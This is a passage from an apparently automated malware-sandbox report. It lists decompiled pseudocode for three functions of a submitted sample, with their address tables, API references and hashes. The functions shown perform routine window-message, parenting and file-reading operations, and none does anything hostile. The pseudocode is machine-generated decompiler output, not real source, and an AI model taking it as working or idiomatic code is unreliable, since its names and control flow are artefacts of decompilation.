												_t208 = E00CA68A8(_t298 - 0x18, _t207);
												 *((char*)(_t298 - 4)) = _t234;
												E00CA2975(_t208,  *((intOrPtr*)(_t298 - 0x2c)) - 0x10);
												E00CA9B75(_t298 - 0x18,  *(_t286 + 0x8c) & 0x000000ff);
											}
											E00CCC671(_t286,  *(_t298 - 0x1c),  *(_t298 - 0x30), _t234);
											_t291 =  *(_t298 - 0x18);
											SendMessageA( *(_t286 + 0x20), 0xc2, 1, _t291);
											_t169 = E00CCC671(_t286,  *(_t298 - 0x1c),  *(_t298 - 0x1c), _t234);
											__eflags =  *((intOrPtr*)(_t291 - 0xc)) - _t234;
											if( *((intOrPtr*)(_t291 - 0xc)) > _t234) {
												do {
													_t169 = E00CBFBBF(_t234,  *(_t298 - 0x34), _t286, _t291,  *(_t298 - 0x1c) + _t234, E00CAAF63(_t298 - 0x18, _t234) & 0x000000ff);
													_t234 = _t234 + 1;
													__eflags = _t234 -  *((intOrPtr*)(_t291 - 0xc));
												} while (_t234 <  *((intOrPtr*)(_t291 - 0xc)));
											}
											L44:
											_t151 = E00CA2975(_t169, _t291 - 0x10);
										} else {
											do {
												_t212 = E00CAAF63(_t262, _t279);
												__eflags = _t212 -  *(_t286 + 0x8c);
												if(_t212 ==  *(_t286 + 0x8c)) {
													goto L22;
												} else {
													_t217 = E00CAAF63(_t286 + 0x84,  *(_t298 - 0x20));
													_t218 = E00CAAF63(_t286 + 0x80,  *(_t298 - 0x20));
													 *0xe17a64(_t218, _t217);
													_t220 =  *((intOrPtr*)( *((intOrPtr*)( *_t286 + 0x164))))();
													__eflags = _t220;
													if(_t220 == 0) {
														goto L29;
													} else {
														_t295 =  *((intOrPtr*)(_t298 - 0x14));
														goto L22;
													}
												}
												goto L48;
												L22:
												_t262 = _t286 + 0x80;
												_t279 =  *(_t298 - 0x20) + 1;
												 *(_t298 - 0x20) = _t279;
												__eflags =  *(_t298 - 0x18) + _t279 - _t295;
											} while ( *(_t298 - 0x18) + _t279 < _t295);
											_t195 =  *(_t298 - 0x1c);
											_t234 = 0;
											__eflags = 0;
											goto L24;
										}
									} else {
										if(_t278 > 1) {
											E00CCAB29(_t282, _t298 - 0x1c, _t298 - 0x14, _t278 - 1, 0);
											_t278 =  *(_t298 - 0x24);
											_t239 =  *((intOrPtr*)(_t298 - 0x14));
											_t193 =  *(_t298 - 0x1c);
										}
										if(_t193 == 0xffffffff || _t239 >= _t278) {
											L29:
											_t151 = MessageBeep(0xffffffff);
										} else {
											_push(0);
											_push(_t239);
											_push(_t239);
											goto L47;
										}
									}
								}
							}
						}
					}
				} else {
					L46:
					MessageBeep(0xffffffff);
					_push(0);
					_push( *((intOrPtr*)(_t298 - 0x14)));
					_push( *(_t298 - 0x1c));
					L47:
					_t151 = E00CCC671(_t282);
				}
				L48:
				return E00DDD4FA(_t151);
			}

0x00ccae6a
0x00ccae71
0x00ccae76
0x00ccae78
0x00ccae8b
0x00ccaea0
0x00ccaea5
0x00ccaea8
0x00ccaeab
0x00ccaeb0
0x00ccaec1
0x00ccaec6
0x00000000
0x00ccaecc
0x00ccaecc
0x00ccaed1
0x00000000
0x00ccaee7
0x00ccaeeb
0x00ccb0fc
0x00ccb0ff
0x00ccb266
0x00ccb26e
0x00ccb273
0x00ccb276
0x00000000
0x00ccb105
0x00ccb10b
0x00ccb115
0x00ccb118
0x00ccb11d
0x00ccb120
0x00ccb123
0x00ccb126
0x00ccb129
0x00ccb129
0x00ccb12b
0x00000000
0x00000000
0x00ccb130
0x00ccb135
0x00ccb138
0x00ccb13a
0x00ccb13b
0x00000000
0x00ccb13b
0x00000000
0x00ccb138
0x00ccb146
0x00ccb149
0x00ccb14c
0x00ccb151
0x00ccb152
0x00ccb154
0x00ccb176
0x00ccb17c
0x00ccb181
0x00ccb184
0x00ccb18b
0x00ccb18d
0x00ccb195
0x00ccb198
0x00ccb19f
0x00ccb1a8
0x00ccb1ac
0x00ccb1b4
0x00ccb1bb
0x00ccb1ca
0x00ccb1cb
0x00ccb1cc
0x00ccb1d6
0x00ccb1da
0x00ccb1de
0x00ccb1e6
0x00ccb1ed
0x00ccb1f2
0x00ccb1f5
0x00ccb1f5
0x00ccb1ff
0x00ccb204
0x00ccb212
0x00ccb220
0x00ccb225
0x00ccb228
0x00ccb22a
0x00ccb22d
0x00ccb241
0x00ccb246
0x00ccb247
0x00ccb247
0x00ccb22d
0x00000000
0x00ccb156
0x00ccb158
0x00ccb161
0x00ccb164
0x00ccb165
0x00000000
0x00ccb165
0x00ccb154
0x00ccaef1
0x00ccaef1
0x00ccaef7
0x00ccaeff
0x00ccb0d5
0x00ccb0dd
0x00ccb0e2
0x00ccb0e5
0x00ccb0e8
0x00ccb0e8
0x00ccb0ec
0x00ccaf05
0x00ccaf05
0x00ccaf0a
0x00ccaf47
0x00ccaf4a
0x00ccaf4a
0x00ccaf4e
0x00ccaf55
0x00ccaf58
0x00ccaf5d
0x00ccaf60
0x00ccaf63
0x00ccaf66
0x00ccaf66
0x00ccaf68
0x00000000
0x00000000
0x00ccaf6d
0x00ccaf72
0x00ccaf75
0x00ccaf77
0x00ccaf78
0x00000000
0x00ccaf78
0x00000000
0x00ccaf75
0x00ccaf7d
0x00ccaf80
0x00ccaf83
0x00ccaf88
0x00ccaf8a
0x00ccaf8d
0x00ccaf93
0x00ccaf98
0x00ccaf9a
0x00ccaf9d
0x00ccaf9e
0x00ccb00a
0x00ccb00a
0x00ccb013
0x00ccb018
0x00ccb01b
0x00ccb01d
0x00ccb02a
0x00ccb033
0x00ccb037
0x00ccb03f
0x00ccb045
0x00ccb055
0x00ccb055
0x00ccb063
0x00ccb068
0x00ccb076
0x00ccb084
0x00ccb089
0x00ccb08c
0x00ccb092
0x00ccb0a8
0x00ccb0ad
0x00ccb0ae
0x00ccb0ae
0x00ccb0b3
0x00ccb24c
0x00ccb24f
0x00ccafa0
0x00ccafa0
0x00ccafa1
0x00ccafa6
0x00ccafac
0x00000000
0x00ccafae
0x00ccafc1
0x00ccafd1
0x00ccafda
0x00ccafe2
0x00ccafe4
0x00ccafe6
0x00000000
0x00ccafec
0x00ccafec
0x00000000
0x00ccafec
0x00ccafe6
0x00000000
0x00ccafef
0x00ccaff2
0x00ccaffb
0x00ccaffe
0x00ccb001
0x00ccb001
0x00ccb005
0x00ccb008
0x00ccb008
0x00000000
0x00ccb008
0x00ccaf0c
0x00ccaf0f
0x00ccaf20
0x00ccaf25
0x00ccaf28
0x00ccaf2b
0x00ccaf2b
0x00ccaf31
0x00ccb0b8
0x00ccb0ba
0x00ccaf3f
0x00ccaf3f
0x00ccaf40
0x00ccaf41
0x00000000
0x00ccaf41
0x00ccaf31
0x00ccaf0a
0x00ccaeff
0x00ccaeeb
0x00ccaed1
0x00ccb27e
0x00ccb27e
0x00ccb280
0x00ccb289
0x00ccb28b
0x00ccb28e
0x00ccb28f
0x00ccb291
0x00ccb291
0x00ccb296
0x00ccb29b

APIs

__EH_prolog3.LIBCMT ref: 00CCAE71
SendMessageA.USER32(?,000000B0,?,?), ref: 00CCAE8B
SendMessageA.USER32(?,000000C2,00000001,?), ref: 00CCB076
MessageBeep.USER32(000000FF), ref: 00CCB0BA
MessageBeep.USER32(000000FF), ref: 00CCB280

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Message$BeepSend$H_prolog3
String ID:
API String ID: 280101887-0
Opcode ID: 595f38bd32da1a7844ce5acad0cf487f98273a833d99831193fba506b580100e
Instruction ID: 9b1a962a7f546f3ab8fe8f0fb249c4244edc617eb949910ca4571b587dfe2d04
Opcode Fuzzy Hash: 595f38bd32da1a7844ce5acad0cf487f98273a833d99831193fba506b580100e
Instruction Fuzzy Hash: E8D138B1E0011AAFCF15DBE4C886EEEBBB9FB48314F14411AE911B3291DB34AD45DB61

Uniqueness

Uniqueness Score: -1.00%

Function 00CFAB65 Relevance: 13.8, APIs: 9, Instructions: 314
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E00CFAB65(void* __ebx, intOrPtr* __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t93;
				signed int _t94;
				signed int _t105;
				signed int _t129;
				signed int _t145;
				struct HWND__* _t147;
				void* _t152;
				signed int _t176;
				intOrPtr* _t177;
				signed int _t178;
				signed int _t199;
				signed int _t214;
				signed int _t218;
				intOrPtr* _t237;
				signed int _t239;
				intOrPtr* _t240;
				signed int _t243;
				void* _t259;

				_t235 = __edx;
				_push(0x28);
				E00DDD52C(0xe0bc4b, __ebx, __edi, __esi);
				_t237 = __ecx;
				_t93 = E00CD8851(__edx, __ecx);
				_t181 = 0xe6872c;
				_t94 = E00D537D5(0xe6872c, __edx, _t93);
				_t176 =  *(_t237 + 0x16c);
				_t239 = _t94;
				 *(_t259 - 0x18) = _t239;
				if(_t176 == 0) {
					L20:
					 *(_t259 - 0x18) =  *(_t259 - 0x18) & 0x00000000;
					_t240 = 0;
					 *((intOrPtr*)(_t259 - 0x10)) = 0;
					if(_t176 == 0) {
						L37:
						_t177 = E00CACA6C(0xe2a530, E00CB277F(_t176, _t181, _t235, GetParent( *(_t237 + 0x20))));
						__eflags = _t177;
						if(_t177 != 0) {
							__eflags = 0;
							 *0xe17a64(0, 0, 0);
							 *((intOrPtr*)( *((intOrPtr*)( *_t177 + 0x224))))();
						}
						L39:
						 *0xe17a64();
						return E00DDD4FA( *((intOrPtr*)( *((intOrPtr*)( *_t237 + 0x184))))());
					} else {
						goto L21;
					}
					do {
						L21:
						_t105 = _t176;
						_t176 =  *_t176;
						E00CFA56F(_t105 + 8);
						 *(_t259 - 0x14) =  *(_t259 - 0x14) & 0x00000000;
						 *(_t259 - 4) = 1;
						 *(_t259 - 0x1c) = E00CFB9C6(_t237,  *((intOrPtr*)(_t259 - 0x2c)), _t259 - 0x14);
						if( *(_t259 - 0x14) == 0) {
							goto L32;
						}
						_t243 =  *(_t259 - 0x14);
						_t55 = _t243 + 4; // 0x4
						E00CA68A8(_t55, _t259 - 0x34);
						 *((intOrPtr*)(_t243 + 0x2c)) =  *((intOrPtr*)(_t259 - 0x24));
						 *((intOrPtr*)(_t243 + 0x30)) =  *((intOrPtr*)(_t259 - 0x20));
						 *((intOrPtr*)(_t243 + 0x44)) =  *((intOrPtr*)(_t259 - 0x28));
						 *0xe17a64( *(_t259 - 0x1c),  *((intOrPtr*)(_t259 - 0x30)), 0, 0);
						_t109 =  *((intOrPtr*)( *((intOrPtr*)( *_t237 + 0x1a8))))();
						if( *((intOrPtr*)(_t259 - 0x30)) != 0) {
							 *((intOrPtr*)(_t259 - 0x10)) =  *((intOrPtr*)(_t259 - 0x10)) + 1;
						}
						if( *((intOrPtr*)(_t259 + 8)) == 0) {
							L31:
							_t240 =  *((intOrPtr*)(_t259 - 0x10));
						} else {
							_t199 =  *(_t259 - 0x18);
							_t235 =  *(_t259 - 0x1c);
							if(_t235 == _t199) {
								goto L31;
							}
							 *0xe17a64(_t235, _t199);
							 *((intOrPtr*)( *((intOrPtr*)( *_t237 + 0x260))))();
							_t109 =  *(_t259 - 0x14);
							_t202 =  *((intOrPtr*)(_t109 + 0x20));
							if( *((intOrPtr*)(_t109 + 0x20)) != 0) {
								_t109 =  *(_t259 - 0x18);
								if( *(_t259 - 0x18) ==  *((intOrPtr*)(_t237 + 0x184))) {
									_t109 = E00CB7B32(_t202, 5);
								}
							}
							_t240 =  *((intOrPtr*)(_t259 - 0x10));
							if(_t240 <= 0) {
								goto L32;
							} else {
								 *0xe17a64( *(_t259 - 0x1c));
								_t109 =  *((intOrPtr*)( *((intOrPtr*)( *_t237 + 0x214))))();
								goto L31;
							}
						}
						L32:
						 *(_t259 - 4) =  *(_t259 - 4) | 0xffffffff;
						_t181 =  *((intOrPtr*)(_t259 - 0x34)) + 0xfffffff0;
						E00CA2975(_t109,  *((intOrPtr*)(_t259 - 0x34)) + 0xfffffff0);
						 *(_t259 - 0x18) =  *(_t259 - 0x18) + 1;
					} while (_t176 != 0);
					if(_t240 <= 0) {
						if(__eflags != 0) {
							goto L39;
						}
						goto L37;
					}
					 *0xe17a64( *((intOrPtr*)(_t237 + 0x184)));
					if( *((intOrPtr*)( *((intOrPtr*)( *_t237 + 0x214))))() == 0) {
						 *0xe17a64(_t176);
						 *((intOrPtr*)( *((intOrPtr*)( *_t237 + 0x214))))();
					}
					goto L39;
				} else {
					goto L1;
				}
				do {
					L1:
					_t129 = _t176;
					_t176 =  *_t176;
					 *(_t259 - 0x14) = _t176;
					E00CFA56F(_t129 + 8);
					 *(_t259 - 4) =  *(_t259 - 4) & 0x00000000;
					 *(_t259 - 0x1c) =  *(_t259 - 0x1c) & 0x00000000;
					_t133 = E00CFB9C6(_t237,  *((intOrPtr*)(_t259 - 0x2c)), _t259 - 0x1c);
					if( *(_t259 - 0x1c) == 0) {
						 *0xe17a64( *((intOrPtr*)(_t259 - 0x2c)), 1);
						_t178 = E00CACA6C(0xe6896c,  *((intOrPtr*)( *((intOrPtr*)( *_t239 + 0x24))))());
						if(_t178 != 0) {
							 *0xe17a64();
							_t214 = _t178;
							if( *((intOrPtr*)( *((intOrPtr*)( *_t178 + 0x16c))))() != 0) {
								E00CB7B32(_t178, 5);
							}
							 *0xe17a64();
							if( *((intOrPtr*)( *((intOrPtr*)( *_t178 + 0x1dc))))() != 0) {
								 *0xe17a64(0, 0xf000, 0, 1);
								 *((intOrPtr*)( *((intOrPtr*)( *_t178 + 0x368))))();
							}
							 *0xe17a64(0);
							_t218 = _t178;
							_t145 =  *((intOrPtr*)( *((intOrPtr*)( *_t178 + 0x228))))();
							 *(_t259 - 0x1c) = _t145;
							if(_t145 != 0) {
								 *0xe17a64(_t178, 0, 0);
								_t218 =  *(_t259 - 0x1c);
								 *((intOrPtr*)( *((intOrPtr*)( *_t145 + 0x17c))))();
							}
							_t147 = E00CB277F(_t178, _t218, _t235, GetParent( *(_t237 + 0x20)));
							if(_t147 != 0) {
								_t147 =  *(_t147 + 0x20);
							}
							E00CB277F(_t178, _t218, _t235, SetParent( *(_t178 + 0x20), _t147));
							_t152 = E00CACA6C(0xe2a530, E00CB277F(_t178, _t218, _t235, GetParent( *(_t237 + 0x20))));
							 *0xe17a64(_t152, 3, 0, 0);
							_t133 =  *((intOrPtr*)( *((intOrPtr*)( *_t178 + 0x34c))))();
						}
						_t176 =  *(_t259 - 0x14);
						_t239 =  *(_t259 - 0x18);
					}
					 *(_t259 - 4) =  *(_t259 - 4) | 0xffffffff;
					_t181 =  *((intOrPtr*)(_t259 - 0x34)) + 0xfffffff0;
					E00CA2975(_t133,  *((intOrPtr*)(_t259 - 0x34)) + 0xfffffff0);
				} while (_t176 != 0);
				_t176 =  *(_t237 + 0x16c);
				goto L20;
			}

0x00cfab65
0x00cfab65
0x00cfab6c
0x00cfab71
0x00cfab74
0x00cfab7b
0x00cfab80
0x00cfab85
0x00cfab8b
0x00cfab8d
0x00cfab92
0x00cfad95
0x00cfad95
0x00cfad99
0x00cfad9b
0x00cfada0
0x00cfaedc
0x00cfaef6
0x00cfaefa
0x00cfaefc
0x00cfaf00
0x00cfaf0d
0x00cfaf15
0x00cfaf15
0x00cfaf17
0x00cfaf21
0x00cfaf30
0x00000000
0x00000000
0x00000000
0x00cfada6
0x00cfada6
0x00cfada6
0x00cfadab
0x00cfadb1
0x00cfadb6
0x00cfadc3
0x00cfadd3
0x00cfadd6
0x00000000
0x00000000
0x00cfaddc
0x00cfade3
0x00cfade6
0x00cfadee
0x00cfadf4
0x00cfadfc
0x00cfae11
0x00cfae19
0x00cfae1f
0x00cfae21
0x00cfae21
0x00cfae28
0x00cfae84
0x00cfae84
0x00cfae2a
0x00cfae2a
0x00cfae2d
0x00cfae32
0x00000000
0x00000000
0x00cfae40
0x00cfae48
0x00cfae4a
0x00cfae4d
0x00cfae52
0x00cfae54
0x00cfae5d
0x00cfae61
0x00cfae61
0x00cfae5d
0x00cfae66
0x00cfae6b
0x00000000
0x00cfae6d
0x00cfae7a
0x00cfae82
0x00000000
0x00cfae82
0x00cfae6b
0x00cfae87
0x00cfae8a
0x00cfae8e
0x00cfae91
0x00cfae96
0x00cfae99
0x00cfaea3
0x00cfaeda
0x00000000
0x00000000
0x00000000
0x00cfaeda
0x00cfaeb5
0x00cfaec1
0x00cfaece
0x00cfaed6
0x00cfaed6
0x00000000
0x00000000
0x00000000
0x00000000
0x00cfab98
0x00cfab98
0x00cfab98
0x00cfab9d
0x00cfaba3
0x00cfaba6
0x00cfabab
0x00cfabb2
0x00cfabbc
0x00cfabc5
0x00cfabd7
0x00cfabed
0x00cfabf3
0x00cfac03
0x00cfac09
0x00cfac0f
0x00cfaca2
0x00cfaca2
0x00cfacb1
0x00cfacbd
0x00cfacd4
0x00cfacdc
0x00cfacdc
0x00cfacea
0x00cfacf0
0x00cfacf2
0x00cfacf4
0x00cfacf9
0x00cfad0a
0x00cfad10
0x00cfad13
0x00cfad13
0x00cfad1f
0x00cfad26
0x00cfad28
0x00cfad28
0x00cfad36
0x00cfad50
0x00cfad68
0x00cfad70
0x00cfad70
0x00cfad72
0x00cfad75
0x00cfad75
0x00cfad7b
0x00cfad7f
0x00cfad82
0x00cfad87
0x00cfad8f
0x00000000

APIs

__EH_prolog3.LIBCMT ref: 00CFAB6C
GetParent.USER32(?), ref: 00CFAC18
GetParent.USER32(?), ref: 00CFAC27
GetParent.USER32(?), ref: 00CFAC3B
SetParent.USER32(?,?,00000000,?,?,?,?,?,?,00000000,00000028), ref: 00CFAC56
GetParent.USER32(?), ref: 00CFAD18
SetParent.USER32(?,00000000,00000000,?,?,?,?,?,?,00000000,00000028), ref: 00CFAD2F
GetParent.USER32(?), ref: 00CFAD3E
GetParent.USER32(?), ref: 00CFAEDF

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Parent$H_prolog3
String ID:
API String ID: 4050631306-0
Opcode ID: 856c49e2851b4b580741bfec95fef989b76687b4732a347adf3d5e29da123e5c
Instruction ID: e460d5136cd9a541aeac1842b2773e2616f87a2a5616aba1a38b22a7ab973131
Opcode Fuzzy Hash: 856c49e2851b4b580741bfec95fef989b76687b4732a347adf3d5e29da123e5c
Instruction Fuzzy Hash: 74C16D71A002199FDF049FA0C999BBEB7B5EF48711F044069F959AB391CB34AE04CF92

Uniqueness

Uniqueness Score: -1.00%

Function 00DF851C Relevance: 13.8, APIs: 9, Instructions: 301
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 82%

			E00DF851C(signed int _a4, void* _a8, unsigned int _a12) {
				char _v5;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				void* _v24;
				void* _v28;
				long _v32;
				char _v36;
				void* _v40;
				long _v44;
				signed int* _t137;
				signed int _t139;
				intOrPtr _t143;
				unsigned int _t154;
				intOrPtr _t158;
				signed int _t160;
				signed int _t163;
				long _t164;
				intOrPtr _t169;
				signed int _t170;
				intOrPtr _t172;
				signed int _t174;
				signed int _t178;
				void _t180;
				char _t185;
				char _t190;
				signed int _t198;
				signed int _t199;
				signed int _t200;
				signed int _t207;
				long _t210;
				unsigned int _t212;
				intOrPtr _t214;
				unsigned int _t217;
				signed int _t219;
				signed int _t220;
				signed int _t221;
				signed int _t222;
				signed char _t224;
				char _t226;
				signed int _t228;
				void* _t229;
				signed int _t230;
				char* _t231;
				char* _t232;
				signed int _t235;
				signed int _t236;
				void* _t240;
				void* _t242;
				void* _t243;

				_t198 = _a4;
				_t246 = _t198 - 0xfffffffe;
				if(_t198 != 0xfffffffe) {
					__eflags = _t198;
					if(__eflags < 0) {
						L59:
						_t137 = E00DE58A7(__eflags);
						 *_t137 =  *_t137 & 0x00000000;
						__eflags =  *_t137;
						 *((intOrPtr*)(E00DE58BA( *_t137))) = 9;
						L60:
						_t139 = E00DE231A();
						goto L61;
					}
					__eflags = _t198 -  *0xe89660; // 0x40
					if(__eflags >= 0) {
						goto L59;
					}
					_t207 = _t198 >> 6;
					_t235 = (_t198 & 0x0000003f) * 0x38;
					_v12 = _t207;
					_t143 =  *((intOrPtr*)(0xe89460 + _t207 * 4));
					_v20 = _t235;
					_v36 = 1;
					_t224 =  *((intOrPtr*)(_t143 + _t235 + 0x28));
					__eflags = 1 & _t224;
					if(__eflags == 0) {
						goto L59;
					}
					_t210 = _a12;
					__eflags = _t210 - 0x7fffffff;
					if(__eflags <= 0) {
						__eflags = _t210;
						if(_t210 == 0) {
							L58:
							return 0;
						}
						__eflags = _t224 & 0x00000002;
						if((_t224 & 0x00000002) != 0) {
							goto L58;
						}
						__eflags = _a8;
						if(__eflags == 0) {
							goto L6;
						}
						_v28 =  *((intOrPtr*)(_t143 + _t235 + 0x18));
						_t226 =  *((intOrPtr*)(_t143 + _t235 + 0x29));
						_v5 = _t226;
						_t240 = 0;
						_t228 = _t226 - 1;
						__eflags = _t228;
						if(_t228 == 0) {
							__eflags =  !_t210 & 0x00000001;
							if(__eflags == 0) {
								L14:
								 *(E00DE58A7(__eflags)) =  *_t149 & _t240;
								 *((intOrPtr*)(E00DE58BA(__eflags))) = 0x16;
								E00DE231A();
								goto L39;
							} else {
								_t154 = 4;
								_t212 = _t210 >> 1;
								_v16 = _t154;
								__eflags = _t212 - _t154;
								if(_t212 >= _t154) {
									_t154 = _t212;
									_v16 = _t212;
								}
								_t240 = E00DF598E(_t154);
								E00DF47C5(0);
								E00DF47C5(0);
								_t243 = _t242 + 0xc;
								_v24 = _t240;
								__eflags = _t240;
								if(__eflags != 0) {
									_t158 = E00DF8A6F(_t198, 0, 0, 1);
									_t242 = _t243 + 0x10;
									_t214 =  *((intOrPtr*)(0xe89460 + _v12 * 4));
									 *((intOrPtr*)(_t235 + _t214 + 0x20)) = _t158;
									 *(_t235 + _t214 + 0x24) = _t228;
									_t229 = _t240;
									_t210 = _v16;
									_t143 =  *((intOrPtr*)(0xe89460 + _v12 * 4));
									L22:
									_t199 = _v20;
									_t235 = 0;
									_v40 = _t229;
									__eflags =  *(_t199 + _t143 + 0x28) & 0x00000048;
									_t200 = _a4;
									if(( *(_t199 + _t143 + 0x28) & 0x00000048) != 0) {
										_t57 = _t143 + 0x2a; // 0x10c483c2
										_t180 =  *((intOrPtr*)(_v20 + _t57));
										_t200 = _a4;
										__eflags = _t180 - 0xa;
										if(_t180 != 0xa) {
											__eflags = _t210;
											if(_t210 != 0) {
												_t235 = 1;
												 *_t229 = _t180;
												_t231 = _t229 + 1;
												_t220 = _t210 - 1;
												__eflags = _v5;
												_v24 = _t231;
												_v16 = _t220;
												 *((char*)(_v20 +  *((intOrPtr*)(0xe89460 + _v12 * 4)) + 0x2a)) = 0xa;
												_t200 = _a4;
												if(_v5 != 0) {
													_t74 =  *((intOrPtr*)(0xe89460 + _v12 * 4)) + 0x2b; // 0x8310c483
													_t185 =  *((intOrPtr*)(_v20 + _t74));
													_t200 = _a4;
													__eflags = _t185 - 0xa;
													if(_t185 != 0xa) {
														__eflags = _t220;
														if(_t220 != 0) {
															 *_t231 = _t185;
															_t232 = _t231 + 1;
															_t221 = _t220 - 1;
															__eflags = _v5 - 1;
															_v24 = _t232;
															_t235 = 2;
															_v16 = _t221;
															 *((char*)(_v20 +  *((intOrPtr*)(0xe89460 + _v12 * 4)) + 0x2b)) = 0xa;
															_t200 = _a4;
															if(_v5 == 1) {
																_t91 =  *((intOrPtr*)(0xe89460 + _v12 * 4)) + 0x2c; // 0xf88310c4
																_t190 =  *((intOrPtr*)(_v20 + _t91));
																_t200 = _a4;
																__eflags = _t190 - 0xa;
																if(_t190 != 0xa) {
																	__eflags = _t221;
																	if(_t221 != 0) {
																		 *_t232 = _t190;
																		_t222 = _t221 - 1;
																		__eflags = _t222;
																		_v16 = _t222;
																		_v24 = _t232 + 1;
																		_t235 = 3;
																		 *((char*)(_v20 +  *((intOrPtr*)(0xe89460 + _v12 * 4)) + 0x2c)) = 0xa;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
									_t160 = E00E04545(_t200);
									__eflags = _t160;
									if(_t160 == 0) {
										L42:
										_v36 = 0;
										L43:
										_t163 = ReadFile(_v28, _v24, _v16,  &_v32, 0);
										__eflags = _t163;
										if(_t163 == 0) {
											L54:
											_t164 = GetLastError();
											_t235 = 5;
											__eflags = _t164 - _t235;
											if(__eflags != 0) {
												__eflags = _t164 - 0x6d;
												if(_t164 != 0x6d) {
													L38:
													E00DE5884(_t164);
													goto L39;
												}
												_t236 = 0;
												goto L40;
											}
											 *((intOrPtr*)(E00DE58BA(__eflags))) = 9;
											 *(E00DE58A7(__eflags)) = _t235;
											goto L39;
										}
										_t217 = _a12;
										__eflags = _v32 - _t217;
										if(_v32 > _t217) {
											goto L54;
										}
										_t236 = _t235 + _v32;
										__eflags = _t236;
										L46:
										_t230 = _v20;
										_t169 =  *((intOrPtr*)(0xe89460 + _v12 * 4));
										__eflags =  *((char*)(_t230 + _t169 + 0x28));
										if( *((char*)(_t230 + _t169 + 0x28)) < 0) {
											__eflags = _v5 - 2;
											if(_v5 == 2) {
												__eflags = _v36;
												_push(_t236 >> 1);
												_push(_v40);
												_push(_t200);
												if(_v36 == 0) {
													_t170 = E00DF8087();
												} else {
													_t170 = E00DF838D();
												}
											} else {
												_t218 = _t217 >> 1;
												__eflags = _t217 >> 1;
												_t170 = E00DF8236(_t217 >> 1, _t217 >> 1, _t200, _v24, _t236, _a8, _t218);
											}
											_t236 = _t170;
										}
										goto L40;
									}
									_t219 = _v20;
									_t172 =  *((intOrPtr*)(0xe89460 + _v12 * 4));
									__eflags =  *((char*)(_t219 + _t172 + 0x28));
									if( *((char*)(_t219 + _t172 + 0x28)) >= 0) {
										goto L42;
									}
									_t174 = GetConsoleMode(_v28,  &_v44);
									__eflags = _t174;
									if(_t174 == 0) {
										goto L42;
									}
									__eflags = _v5 - 2;
									if(_v5 != 2) {
										goto L43;
									}
									_t178 = ReadConsoleW(_v28, _v24, _v16 >> 1,  &_v32, 0);
									__eflags = _t178;
									if(_t178 != 0) {
										_t217 = _a12;
										_t236 = _t235 + _v32 * 2;
										goto L46;
									}
									_t164 = GetLastError();
									goto L38;
								} else {
									 *((intOrPtr*)(E00DE58BA(__eflags))) = 0xc;
									 *(E00DE58A7(__eflags)) = 8;
									L39:
									_t236 = _t235 | 0xffffffff;
									__eflags = _t236;
									L40:
									E00DF47C5(_t240);
									return _t236;
								}
							}
						}
						__eflags = _t228 == 1;
						if(_t228 == 1) {
							__eflags =  !_t210 & 0x00000001;
							if(__eflags != 0) {
								_t229 = _a8;
								_v16 = _t210;
								_v24 = _t229;
								_t143 =  *((intOrPtr*)(0xe89460 + _v12 * 4));
								goto L22;
							}
							goto L14;
						} else {
							_t229 = _a8;
							_v16 = _t210;
							_v24 = _t229;
							goto L22;
						}
					}
					L6:
					 *(E00DE58A7(__eflags)) =  *_t145 & 0x00000000;
					 *((intOrPtr*)(E00DE58BA(__eflags))) = 0x16;
					goto L60;
				} else {
					 *(E00DE58A7(_t246)) =  *_t197 & 0x00000000;
					_t139 = E00DE58BA(_t246);
					 *_t139 = 9;
					L61:
					return _t139 | 0xffffffff;
				}
			}

0x00df8525
0x00df8529
0x00df852c
0x00df8546
0x00df8548
0x00df88ad
0x00df88ad
0x00df88b2
0x00df88b2
0x00df88ba
0x00df88c0
0x00df88c0
0x00000000
0x00df88c0
0x00df854e
0x00df8554
0x00000000
0x00000000
0x00df855e
0x00df8564
0x00df8567
0x00df856a
0x00df8574
0x00df8577
0x00df857a
0x00df857e
0x00df8580
0x00000000
0x00000000
0x00df8586
0x00df8589
0x00df858f
0x00df85a9
0x00df85ab
0x00df88a9
0x00000000
0x00df88a9
0x00df85b1
0x00df85b4
0x00000000
0x00000000
0x00df85ba
0x00df85be
0x00000000
0x00000000
0x00df85c4
0x00df85c7
0x00df85cb
0x00df85d2
0x00df85d4
0x00df85d4
0x00df85d7
0x00df862c
0x00df862e
0x00df85f4
0x00df85f9
0x00df8600
0x00df8606
0x00000000
0x00df8630
0x00df8632
0x00df8633
0x00df8635
0x00df8638
0x00df863a
0x00df863c
0x00df863e
0x00df863e
0x00df8649
0x00df864b
0x00df8652
0x00df8657
0x00df865a
0x00df865d
0x00df865f
0x00df8683
0x00df868b
0x00df868e
